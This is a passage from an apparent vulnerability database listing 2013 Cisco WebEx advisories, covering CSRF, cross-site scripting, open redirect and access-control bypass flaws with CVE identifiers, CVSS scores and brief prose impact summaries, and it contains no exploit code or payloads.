Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Training Center allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCul25567. Vendors have confirmed this vulnerability Bug ID CSCul25567 It is released as.Authentication may be hijacked by a third party. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCul25567. Cisco WebEx Training Center is an e-learning solution in a set of WebEx meeting solutions of Cisco (Cisco). The program provides a wealth of tools for online classrooms, online training, and online exams
VAR-201312-0459 CVE-2013-6711 Cisco WebEx Sales Center Cross-site scripting vulnerability in the product creation management page CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the product-creation administrative page in Cisco WebEx Sales Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul25540. Cisco WebEx Sales Center Product creation (product-creation) Contains a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCul25540. The solution supports the creation of personalized sales processes, online presentations, sales tracking and reporting, and more
VAR-201312-0248 CVE-2013-6959 Cisco WebEx Sales Center Open redirect vulnerability CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
Open redirect vulnerability in Cisco WebEx Sales Center allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka Bug ID CSCul25557. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible. This issue is being tracked by Cisco Bug ID CSCul25557. The solution supports the creation of personalized sales processes, online presentations, sales tracking and reporting, and more
VAR-201312-0249 CVE-2013-6960 Cisco WebEx Meeting Center Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in Cisco WebEx Meeting Center allow remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36248. Cisco WebEx Meeting Center Contains a cross-site scripting vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCul36248. The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
VAR-201312-0250 CVE-2013-6961 Cisco WebEx Meeting Center of Collaboration Partner Access Console Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the Collaboration Partner Access Console (CPAC) in Cisco WebEx Meeting Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36237. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCul36237. Cisco WebEx Meeting Center is an online meeting product in a set of WebEx meeting solutions of Cisco (Cisco). The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
VAR-201312-0251 CVE-2013-6962 Cisco WebEx Meeting Center Mobile browser subsystem vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the mobile-browser subsystem in Cisco WebEx Meeting Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36228. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCul36228. Cisco WebEx Meeting Center is an online meeting product in a set of WebEx meeting solutions of Cisco (Cisco). The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
VAR-201312-0252 CVE-2013-6963 Cisco WebEx Training Center Cross-site scripting vulnerability in the registration component CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the registration component in Cisco WebEx Training Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36207. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCul36207. Cisco WebEx Training Center is an e-learning solution in a set of WebEx meeting solutions of Cisco (Cisco). The program provides a wealth of tools for online classrooms, online training, and online exams. The vulnerability is caused by the page not adequately filtering the input submitted by the user
VAR-201312-0253 CVE-2013-6964 Cisco WebEx Meeting Center Vulnerability that bypasses access control CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Cisco WebEx Meeting Center allows remote authenticated users to bypass access control and inject content from a different WebEx site via unspecified vectors, aka Bug ID CSCul36197. Cisco WebEx Meeting Center is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCul36197. The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more